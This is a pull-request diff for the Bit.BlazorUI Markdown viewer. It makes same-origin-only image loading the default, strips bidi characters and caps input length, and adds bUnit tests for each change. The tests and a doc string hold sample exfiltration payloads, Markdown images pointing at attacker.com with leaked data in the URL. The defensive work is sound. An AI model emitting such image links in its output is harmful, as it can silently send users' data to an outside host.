                 },
             ]
         },

--- a/src/BlazorUI/Demo/Client/Bit.BlazorUI.Demo.Client.Core/Pages/Components/Extras/MarkdownViewer/BitMarkdownViewerDemo.razor.cs
+++ b/src/BlazorUI/Demo/Client/Bit.BlazorUI.Demo.Client.Core/Pages/Components/Extras/MarkdownViewer/BitMarkdownViewerDemo.razor.cs
@@ -28,10 +28,11 @@ public partial class BitMarkdownViewerDemo
         {
            Name = "ImageRendering",
            Type = "BitMarkdownViewerImageRendering",
-           DefaultValue = "BitMarkdownViewerImageRendering.All",
+           DefaultValue = "BitMarkdownViewerImageRendering.SameOrigin",
            Description = @"Controls whether remote images are allowed to load, guarding against silent data-exfiltration
                            via auto-fetched image URLs (for example ![x](https://attacker.com/leak?data=SECRET)).
-                           Set it to SameOrigin or None when rendering untrusted or AI-generated Markdown.",
+                           Defaults to the safe SameOrigin policy; set it to All to load every remote image when the
+                           source is fully trusted, or None for the strictest policy.",
            LinkType = LinkType.Link,
            Href = "#markdown-viewer-image-rendering-enum",
         },
@@ -410,7 +411,11 @@ Supports ~~strikethrough~~ and bare links like https://bitplatform.dev
     <div class=""mdv-split"">
         <textarea class=""mdv-editor"" spellcheck=""false"" aria-label=""Markdown editor"" @bind=""playgroundMarkdown"" @bind:event=""oninput""></textarea>
         <div class=""mdv-preview"">
-            <BitMarkdownViewer Markdown=""@playgroundMarkdown"" Pipeline=""@playgroundPipeline"" />
+            <BitMarkdownViewer Markdown=""@playgroundMarkdown""
+                               Pipeline=""@playgroundPipeline""
+                               ImageRendering=""BitMarkdownViewerImageRendering.SameOrigin""
+                               StripBidiControlCharacters=""true""
+                               MaxLength=""100000"" />
         </div>
     </div>
 </div>";

--- a/src/BlazorUI/Tests/Bit.BlazorUI.Tests/Components/Extras/MarkdownViewer/BitMarkdownViewerTests.cs
+++ b/src/BlazorUI/Tests/Bit.BlazorUI.Tests/Components/Extras/MarkdownViewer/BitMarkdownViewerTests.cs
@@ -240,6 +240,37 @@ public class BitMarkdownViewerTests : BunitTestContext
     }
 
     [TestMethod]
+    public void BitMarkdownViewerShouldKeepAbsoluteSameOriginImagesInSameOriginMode()
+    {
+        // bUnit's test host resolves to http://localhost/, so an absolute URL that points
+        // back at that origin must NOT be blocked under the SameOrigin policy.
+        var component = RenderComponent<BitMarkdownViewer>(parameters =>
+        {
+            parameters.Add(p => p.Markdown, "![local](http://localhost/assets/logo.png)");
+            parameters.Add(p => p.ImageRendering, BitMarkdownViewerImageRendering.SameOrigin);
+        });
+
+        var imgs = component.FindAll(".bit-mdv img");
+        Assert.AreEqual(1, imgs.Count);
+        Assert.AreEqual("http://localhost/assets/logo.png", imgs[0].GetAttribute("src"));
+    }
+
+    [TestMethod]
+    public void BitMarkdownViewerShouldBlockRemoteImagesByDefault()
+    {
+        // ImageRendering defaults to the safe SameOrigin policy, so a cross-origin image
+        // is blocked even when the parameter is not set explicitly.
+        var component = RenderComponent<BitMarkdownViewer>(parameters =>
+        {
+            parameters.Add(p => p.Markdown, "![leak](https://attacker.com/leak?data=secret)");
+        });
+
+        var imgs = component.FindAll(".bit-mdv img");
+        Assert.AreEqual(1, imgs.Count);
+        Assert.AreEqual(string.Empty, imgs[0].GetAttribute("src") ?? string.Empty);
+    }
+
+    [TestMethod]
     public void BitMarkdownViewerShouldBlockProtocolRelativeImagesInSameOriginMode()
     {
         var component = RenderComponent<BitMarkdownViewer>(parameters =>
@@ -273,6 +304,7 @@ public class BitMarkdownViewerTests : BunitTestContext
         var component = RenderComponent<BitMarkdownViewer>(parameters =>
         {
             parameters.Add(p => p.Markdown, "![x](https://example.com/a.png)");
+            parameters.Add(p => p.ImageRendering, BitMarkdownViewerImageRendering.All);
         });
 
         var imgs = component.FindAll(".bit-mdv img");
@@ -322,6 +354,54 @@ public class BitMarkdownViewerTests : BunitTestContext
         });
 
         Assert.Contains("\u202E", component.Markup);
+    }
+
+    [TestMethod]
+    public void BitMarkdownViewerShouldReparseWhenHardeningOptionsChange()
+    {
+        // The component caches the parsed AST and only re-parses when an output-affecting
+        // input changes. Toggling the hardening options after the first render must
+        // invalidate that cache instead of reusing stale state.
+        var component = RenderComponent<BitMarkdownViewer>(parameters =>
+        {
+            parameters.Add(p => p.Markdown, "![leak](https://attacker.com/a.png)\n\n# hello world");
+            parameters.Add(p => p.ImageRendering, BitMarkdownViewerImageRendering.All);
+        });
+
+        // First render: All policy keeps the remote image and the full heading text.
+        Assert.AreEqual("https://attacker.com/a.png", component.FindAll(".bit-mdv img")[0].GetAttribute("src"));
+        Assert.Contains("<h1>hello world</h1>", component.Markup);
+
+        // Tighten ImageRendering and cap the length; the cached AST must be rebuilt.
+        component.SetParametersAndRender(parameters =>
+        {
+            parameters.Add(p => p.ImageRendering, BitMarkdownViewerImageRendering.SameOrigin);
+            parameters.Add(p => p.MaxLength, 38); // truncates before "world"
+        });
+
+        Assert.AreEqual(string.Empty, component.FindAll(".bit-mdv img")[0].GetAttribute("src") ?? string.Empty);
+        Assert.DoesNotContain("world", component.Markup);
+    }
+
+    [TestMethod]
+    public void BitMarkdownViewerShouldReparseWhenStripBidiToggles()
+    {
+        var markdown = "a\u202Eb";
+
+        var component = RenderComponent<BitMarkdownViewer>(parameters =>
+        {
+            parameters.Add(p => p.Markdown, markdown);
+        });
+
+        // Default keeps the bidi control character.
+        Assert.Contains("\u202E", component.Markup);
+
+        component.SetParametersAndRender(parameters =>
+        {
+            parameters.Add(p => p.StripBidiControlCharacters, true);
+        });
+
+        Assert.DoesNotContain("\u202E", component.Markup);
     }
 
     [TestMethod]

--- a/src/BlazorUI/Tests/Bit.BlazorUI.Tests/Components/Extras/MarkdownViewer/BitMarkdownViewerTests.cs
+++ b/src/BlazorUI/Tests/Bit.BlazorUI.Tests/Components/Extras/MarkdownViewer/BitMarkdownViewerTests.cs
@@ -206,4 +206,135 @@ public class BitMarkdownViewerTests : BunitTestContext
 
         Assert.Contains("<del>gone</del>", component.Markup);
     }
+
+    [TestMethod]
+    public void BitMarkdownViewerShouldBlockRemoteImagesInSameOriginMode()
+    {
+        var component = RenderComponent<BitMarkdownViewer>(parameters =>
+        {
+            parameters.Add(p => p.Markdown, "![leak](https://attacker.com/leak?data=secret)");
+            parameters.Add(p => p.ImageRendering, BitMarkdownViewerImageRendering.SameOrigin);
+        });
+
+        var imgs = component.FindAll(".bit-mdv img");
+        Assert.AreEqual(1, imgs.Count);
+        // No src means the browser never issues the cross-origin (exfiltration) request.
+        var src = imgs[0].GetAttribute("src") ?? string.Empty;
+        Assert.AreEqual(string.Empty, src);
+        // Alt text is preserved for accessibility.
+        Assert.AreEqual("leak", imgs[0].GetAttribute("alt"));
+    }
+
+    [TestMethod]
+    public void BitMarkdownViewerShouldKeepRelativeImagesInSameOriginMode()
+    {
+        var component = RenderComponent<BitMarkdownViewer>(parameters =>
+        {
+            parameters.Add(p => p.Markdown, "![local](/assets/logo.png)");
+            parameters.Add(p => p.ImageRendering, BitMarkdownViewerImageRendering.SameOrigin);
+        });
+
+        var imgs = component.FindAll(".bit-mdv img");
+        Assert.AreEqual(1, imgs.Count);
+        Assert.AreEqual("/assets/logo.png", imgs[0].GetAttribute("src"));
+    }
+
+    [TestMethod]
+    public void BitMarkdownViewerShouldBlockProtocolRelativeImagesInSameOriginMode()
+    {
+        var component = RenderComponent<BitMarkdownViewer>(parameters =>
+        {
+            parameters.Add(p => p.Markdown, "![x](//attacker.com/a.png)");
+            parameters.Add(p => p.ImageRendering, BitMarkdownViewerImageRendering.SameOrigin);
+        });
+
+        var imgs = component.FindAll(".bit-mdv img");
+        Assert.AreEqual(1, imgs.Count);
+        Assert.AreEqual(string.Empty, imgs[0].GetAttribute("src") ?? string.Empty);
+    }
+
+    [TestMethod]
+    public void BitMarkdownViewerShouldBlockAllImagesInNoneMode()
+    {
+        var component = RenderComponent<BitMarkdownViewer>(parameters =>
+        {
+            parameters.Add(p => p.Markdown, "![local](/assets/logo.png)");
+            parameters.Add(p => p.ImageRendering, BitMarkdownViewerImageRendering.None);
+        });
+
+        var imgs = component.FindAll(".bit-mdv img");
+        Assert.AreEqual(1, imgs.Count);
+        Assert.AreEqual(string.Empty, imgs[0].GetAttribute("src") ?? string.Empty);
+    }
+
+    [TestMethod]
+    public void BitMarkdownViewerShouldAddNoReferrerToImages()
+    {
+        var component = RenderComponent<BitMarkdownViewer>(parameters =>
+        {
+            parameters.Add(p => p.Markdown, "![x](https://example.com/a.png)");
+        });
+
+        var imgs = component.FindAll(".bit-mdv img");
+        Assert.AreEqual(1, imgs.Count);
+        Assert.AreEqual("https://example.com/a.png", imgs[0].GetAttribute("src"));
+        Assert.AreEqual("no-referrer", imgs[0].GetAttribute("referrerpolicy"));
+    }
+
+    [TestMethod]
+    public void BitMarkdownViewerShouldNotOverflowOnDeeplyNestedInput()
+    {
+        // Without a depth limit this triggers an (uncatchable) StackOverflowException
+        // that would crash the host. The depth guard must keep it bounded.
+        var markdown = new string('>', 5000) + " boom";
+
+        var component = RenderComponent<BitMarkdownViewer>(parameters =>
+        {
+            parameters.Add(p => p.Markdown, markdown);
+        });
+
+        Assert.Contains("boom", component.Markup);
+    }
+
+    [TestMethod]
+    public void BitMarkdownViewerShouldStripBidiControlCharactersWhenEnabled()
+    {
+        // U+202E (RIGHT-TO-LEFT OVERRIDE) is a Trojan-Source spoofing character.
+        var markdown = "a\u202Eb";
+
+        var component = RenderComponent<BitMarkdownViewer>(parameters =>
+        {
+            parameters.Add(p => p.Markdown, markdown);
+            parameters.Add(p => p.StripBidiControlCharacters, true);
+        });
+
+        Assert.DoesNotContain("\u202E", component.Markup);
+    }
+
+    [TestMethod]
+    public void BitMarkdownViewerShouldKeepBidiControlCharactersByDefault()
+    {
+        var markdown = "a\u202Eb";
+
+        var component = RenderComponent<BitMarkdownViewer>(parameters =>
+        {
+            parameters.Add(p => p.Markdown, markdown);
+        });
+
+        Assert.Contains("\u202E", component.Markup);
+    }
+
+    [TestMethod]
+    public void BitMarkdownViewerShouldRespectMaxLength()
+    {
+        var component = RenderComponent<BitMarkdownViewer>(parameters =>
+        {
+            parameters.Add(p => p.Markdown, "# hello world");
+            parameters.Add(p => p.MaxLength, 3); // "# h"
+        });
+
+        var markup = component.Markup;
+        Assert.Contains("<h1>h</h1>", markup);
+        Assert.DoesNotContain("hello", markup);
+    }
 }


### PR DESCRIPTION
closes #12551

<!-- This is an auto-generated comment: release notes by coderabbit.ai -->

## Summary by CodeRabbit

* **New Features**
  * Added configurable Markdown image handling with options to allow all images, block remote images, or remove image sources entirely.
  * Added controls to limit parsing depth, cap input length, and strip Unicode bidi control characters.

* **Bug Fixes**
  * Improved Markdown safety by handling malformed or complex input more gracefully.
  * Added protection against regex timeouts during autolinking and email detection.
  * Rendered images now use a no-referrer policy to reduce accidental URL exposure.

<!-- end of auto-generated comment: release notes by coderabbit.ai -->